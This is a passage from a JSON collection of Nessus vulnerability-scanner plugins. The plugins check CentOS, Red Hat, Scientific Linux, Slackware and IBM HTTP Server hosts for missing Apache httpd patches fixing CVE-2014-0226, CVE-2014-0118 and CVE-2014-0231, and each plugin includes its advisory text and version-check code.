reference:\"httpd-manual-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-87.el5_10\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-debuginfo-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-devel-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-manual-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-tools-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-tools-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_ssl-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_ssl-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.15-31.el6_5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:29:38", "description": "Updated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.", "edition": 25, "published": "2014-07-24T00:00:00", "title": "CentOS 5 / 6 : httpd (CESA-2014:0920)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-24T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:mod_ssl", "p-cpe:/a:centos:centos:httpd-manual", "p-cpe:/a:centos:centos:httpd-tools", "p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2014-0920.NASL", "href": "https://www.tenable.com/plugins/nessus/76715", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0920 and \n# CentOS Errata and Security Advisory 2014:0920 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76715);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"CentOS 5 / 6 : httpd (CESA-2014:0920)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-July/020440.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dd7ee438\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-July/020441.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d737081a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0226\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-2.2.3-87.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-devel-2.2.3-87.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-manual-2.2.3-87.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"mod_ssl-2.2.3-87.el5.centos\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-2.2.15-31.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-devel-2.2.15-31.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-manual-2.2.15-31.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-tools-2.2.15-31.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mod_ssl-2.2.15-31.el6.centos\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T18:22:55", "description": "A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAfter installing the updated packages, the httpd daemon will be\nrestarted automatically.", "edition": 14, "published": "2014-07-24T00:00:00", "title": "Scientific Linux Security Update : httpd on SL5.x, SL6.x i386/x86_64 (20140723)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-24T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo", "p-cpe:/a:fermilab:scientific_linux:httpd-tools", "p-cpe:/a:fermilab:scientific_linux:httpd-manual", "p-cpe:/a:fermilab:scientific_linux:mod_ssl", "p-cpe:/a:fermilab:scientific_linux:httpd", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:httpd-devel"], "id": "SL_20140723_HTTPD_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/76753", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76753);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL5.x, SL6.x i386/x86_64 (20140723)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAfter installing the updated packages, the httpd daemon will be\nrestarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1407&L=scientific-linux-errata&T=0&P=1884\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6a0123d9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"httpd-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-debuginfo-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-devel-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-manual-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mod_ssl-2.2.3-87.sl5\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"httpd-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-debuginfo-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-devel-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-manual-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-tools-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mod_ssl-2.2.15-31.sl6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:10:02", "description": "New httpd packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix security issues.", "edition": 22, "published": "2014-07-24T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : httpd (SSA:2014-204-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:13.0", "p-cpe:/a:slackware:slackware_linux:httpd", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2014-204-01.NASL", "href": "https://www.tenable.com/plugins/nessus/76712", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-204-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76712);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/07/26 04:39:24 $\");\n\n script_cve_id(\"CVE-2014-0117\", \"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"SSA\", value:\"2014-204-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : httpd (SSA:2014-204-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New httpd packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.616658\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4c5ef3e6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"httpd\", pkgver:\"2.2.27\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.27\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"httpd\", pkgver:\"2.2.27\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.27\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"httpd\", pkgver:\"2.2.27\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.27\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-17T03:21:44", "description": "The version of IBM HTTP Server running on the remote host is affected by multiple vulnerabilities, as follows:\n\n - Race condition in the mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to\ncause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential\ninformation or execute arbitrary code, via a crafted request that triggers improper scoreboard handling\nwithin the status_handler function in modules/generators/mod_status.c and the lua_ap_scoreboard_worker\nfunction in modules/lua/lua_request.c. (CVE-2014-0226)\n\n - The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechanism, which\nallows remote attackers to cause a denial of service (process hang) via a request to a CGI script that\ndoes not read from its stdin file descriptor. (CVE-2014-0231)\n\n - The deflate_in_filter function in mod_deflate.c in the mod_deflate module in the Apache HTTP Server before\n2.4.10, when request body decompression is enabled, allows remote attackers to cause a denial of service\n(resource consumption) via crafted request data that decompresses to a much larger size. (CVE-2014-0118)\n\n - The mod_headers module in the Apache HTTP Server 2.2.22 allows remote attackers to bypass 'RequestHeader\nunset' directives by placing a header in the trailer portion of data sent with chunked transfer coding.\nNOTE: the vendor states 'this is not a security issue in httpd as such.' (CVE-2013-5704)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2020-12-15T00:00:00", "title": "IBM HTTP Server 8.5.0.0 <= 8.5.5.2 / 8.0.0.0 <= 8.0.0.9 / 7.0.0.0 <= 7.0.0.33 / 6.1.0.0. <= 6.1.0.47 / 6.0.2.0 <= 6.0.2.43 Multiple Vulnerabilities (509275)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2020-12-15T00:00:00", "cpe": ["cpe:/a:ibm:http_server"], "id": "IBM_HTTP_SERVER_509275.NASL", "href": "https://www.tenable.com/plugins/nessus/144289", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144289);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/16\");\n\n script_cve_id(\n \"CVE-2013-5704\",\n \"CVE-2014-0118\",\n \"CVE-2014-0226\",\n \"CVE-2014-0231\"\n );\n script_bugtraq_id(\n 66550,\n 68678,\n 68742,\n 68745\n );\n\n script_name(english:\"IBM HTTP Server 8.5.0.0 <= 8.5.5.2 / 8.0.0.0 <= 8.0.0.9 / 7.0.0.0 <= 7.0.0.33 / 6.1.0.0. <= 6.1.0.47 / 6.0.2.0 <= 6.0.2.43 Multiple Vulnerabilities (509275)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of IBM HTTP Server running on the remote host is affected by multiple vulnerabilities, as follows:\n\n - Race condition in the mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to\ncause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential\ninformation or execute arbitrary code, via a crafted request that triggers improper scoreboard handling\nwithin the status_handler function in modules/generators/mod_status.c and the lua_ap_scoreboard_worker\nfunction in modules/lua/lua_request.c. (CVE-2014-0226)\n\n - The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechanism, which\nallows remote attackers to cause a denial of service (process hang) via a request to a CGI script that\ndoes not read from its stdin file descriptor. (CVE-2014-0231)\n\n - The deflate_in_filter function in mod_deflate.c in the mod_deflate module in the Apache HTTP Server 